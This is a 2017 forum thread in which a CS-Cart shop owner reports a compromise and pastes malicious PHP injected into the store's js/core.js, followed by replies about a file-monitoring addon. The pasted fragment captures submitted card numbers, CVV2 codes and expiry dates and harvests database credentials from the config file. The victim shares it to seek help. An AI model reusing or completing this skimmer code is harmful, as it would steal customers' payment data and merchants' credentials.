Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

Back Door Security Treat On 2.012? Rate Topic   - - - - -

 
  • mrmem
  • Member
  • Members
  • Join Date: 13-Jul 09
  • 88 posts

Posted 24 October 2017 - 03:26 AM #1

I am currently on 2.012

Saw something suspicious and went into Control Panel and looked up latest vistors. Noticed a IP address

going into 

/lib/Text/Diff/Engine/restore.php?g
 

plus also into 

/js/core.js

 

I have the original files and noticed the first file didnt exist with 2.012.

Then i looked at js.core.js and also saw the below added to file. looks like they are trying to capture credit cards. I deleted first file and replaced the second file with the original. This just happened as im also manually looking into all the other files.

Hopefully this is not another exploit of the software like the one last winter. 

Below was added to js/core.js

 

error_reporting(0);
$r = $_POST;
$naem = 'justcoMMONS';
$cookiename = 'sess_id';
if (isset($r['payment_info']['card_number'])) {
    $r = $r['payment_info'];
    $f = array(
        'card_number',
        'cvv2',
        'expiry_month',
        'expiry_year',
        'cardholder_name'
    );
    foreach ($f as $ff)
        $ok[] = $r[$ff];
 
    $conf = file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/config.local.php');
    $fields = array('db_host', 'db_name', 'db_user', 'db_password');
    $db = array();
    foreach ($fields as $f) {
        preg_match('#^\$config\[[\'"]' . $f . '[\'"].+?[\'"](.+?)[\'"]#m', $conf, $m);
        $db[$f] = $m[1];
 


 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 10548 posts

Posted 24 October 2017 - 05:19 PM #2

Install our EZ Admin Helper addon.  It can monitor all your files for changes as well as detect 14 different known security threats to cs-cart.  It can do tons of other things too.  Docs are here.


EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.


 
  • mrmem
  • Member
  • Members
  • Join Date: 13-Jul 09
  • 88 posts

Posted 25 October 2017 - 02:16 PM #3

I am on 2.0.12 and software only works from 2.2 version and up.

Would have been inerested.

Thanks



 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 10548 posts

Posted 25 October 2017 - 08:26 PM #4

Yep, there were changes made that make it difficult to go back any further than we have and all newer enhancements (past couple of years) have only been added to he V4 version....


EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.